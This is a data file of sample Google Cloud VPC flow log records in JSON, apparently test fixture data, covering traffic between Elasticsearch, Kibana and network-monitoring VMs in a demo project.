-{"insertId":"19im82tfdygzng","jsonPayload":{"bytes_sent":"174524","connection":{"dest_ip":"10.87.40.76","dest_port":33968,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965294083Z","packets_sent":"66","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480272197Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygzo1","jsonPayload":{"bytes_sent":"181624065","connection":{"dest_ip":"10.49.136.133","dest_port":52780,"protocol":6,"src_ip":"203.0.113.228","src_port":9243},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:58.592579489Z","packets_sent":"28344","reporter":"DEST","rtt_msec":"91","src_location":{"asn":16509,"city":"Boardman","continent":"America","country":"usa","region":"Oregon"},"start_time":"2019-06-14T03:40:17.183499423Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzo8","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":51348},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:20.754300982Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:20.630975303Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygzoa","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"192.0.2.12","dest_port":44128,"protocol":6,"src_ip":"10.73.186.17","src_port":22},"dest_location":{"asn":4837,"city":"Binzhou","continent":"Asia","country":"chn","region":"Shandong"},"end_time":"2019-06-14T03:45:22.081121292Z","packets_sent":"1","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:22.080963433Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzn7","jsonPayload":{"bytes_sent":"11137","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33968},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965294083Z","packets_sent":"95","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480272197Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"75801985
4043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznf","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"198.51.100.107","dest_port":54812,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:20.708994883Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:20.595119257Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygzni","jsonPayload":{"bytes_sent":"21792","connection":{"dest_ip":"203.0.113.134","dest_port":33564,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597079770Z","packets_sent":"186","reporter":"SRC","rtt_msec":"340","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866944869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygzns","jsonPayload":{"bytes_sent":"74370","connection":{"dest_ip":"203.0.113.58","dest_port":49438,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220725956Z","packets_sent":"580","reporter":"SRC","rtt_msec":"114","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.398463104Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznp","jsonPayload":{"bytes_sent":"138337","connection":{"dest_ip":"10.87.40.76","dest_port":33550,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"244","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-proj
ect","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzo9","jsonPayload":{"bytes_sent":"30062","connection":{"dest_ip":"192.0.2.177","dest_port":60110,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:46.020466750Z","packets_sent":"124","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:10.874529937Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygzo3","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.0.2.117","dest_port":51348,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:20.754300982Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:20.630975303Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygznz","jsonPayload":{"bytes_sent":"152218","connection":{"dest_ip":"203.0.113.134","dest_port":33560,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565026127Z","packets_sent":"243","reporter":"SRC","rtt_msec":"116","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.076060079Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwo
rk_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzo4","jsonPayload":{"bytes_sent":"143085","connection":{"dest_ip":"203.0.113.134","dest_port":33510,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565078274Z","packets_sent":"249","reporter":"SRC","rtt_msec":"352","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074688714Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygznt","jsonPayload":{"bytes_sent":"61245","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33510},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565078274Z","packets_sent":"356","reporter":"DEST","rtt_msec":"352","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074688714Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygznu","jsonPayload":{"bytes_sent":"65919","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33532},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"361","reporter":"DEST","rtt_msec":"270","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072555233Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygzo6","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"198.51.100.182","dest_port":41822,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"end_time":"2019-06-14T03:40:40.058368408Z","packets_sent":"4","reporter":"SRC","rtt_msec":"1439","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:12.068494835Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzno","jsonPayload":{"bytes_sent":"188997","connection":{"dest_ip":"203.0.113.134","dest_port":33532,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"251","reporter":"SRC","rtt_msec":"270","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072555233Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subne
twork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} -{"insertId":"19im82tfdygzo0","jsonPayload":{"bytes_sent":"16783","connection":{"dest_ip":"203.0.113.134","dest_port":33568,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789035952Z","packets_sent":"79","reporter":"SRC","rtt_msec":"506","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.456732113Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygznd","jsonPayload":{"bytes_sent":"18120","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33858},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"120","reporter":"SRC","rtt_msec":"4","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458361534Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygzn8","jsonPayload":{"bytes_sent":"64071","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33558},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"368","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140109489Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygznw","jsonPayload":{"bytes_sent":"175465","connection":{"dest_ip":"198.51.100.88","dest_port":53106,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.401543207Z","packets_sent":"337","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.020290305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygzo2","jsonPayload":{"bytes_sent":"1987804","connection":{"dest_ip":"203.0.113.228","dest_port":9243,"protocol":6,"src_ip":"10.49.136.133","src_port":52780},"dest_location":{"asn":16509,"city":"Boardman","continent":"America","country":"usa","region":"Oregon"},"end_time":"2019-06-14T03:49:58.592579489Z","packets_sent":"26428","reporter":"SRC","rtt_msec":"91","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:17.183499423Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygzn9","jsonPayload":{"bytes_sent":"206824","connection":{"dest_ip":"10.87.40.76","dest_port":33532,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"242","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072372604Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygznh","jsonPayload":{"bytes_sent":"14287","connection":{"dest_ip":"10.87.40.76","dest_port":33858,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"80","reporter":"DEST","rtt_msec":"4","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458361534Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygzny","jsonPayload":{"bytes_sent":"59376","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33550},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108649Z","packets_sent":"354","reporter":"DEST","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.496238286Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygzoe","jsonPayload":{"bytes_sent":"11214","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33568},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789035952Z","packets_sent":"120","reporter":"DEST","rtt_msec":"506","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.456732113Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygznn","jsonPayload":{"bytes_sent":"1763338","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"198.51.100.88","src_port":53106},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.401543207Z","packets_sent":"598","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.020290305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygznl","jsonPayload":{"bytes_sent":"67239","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33590},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"363","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.146956782Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17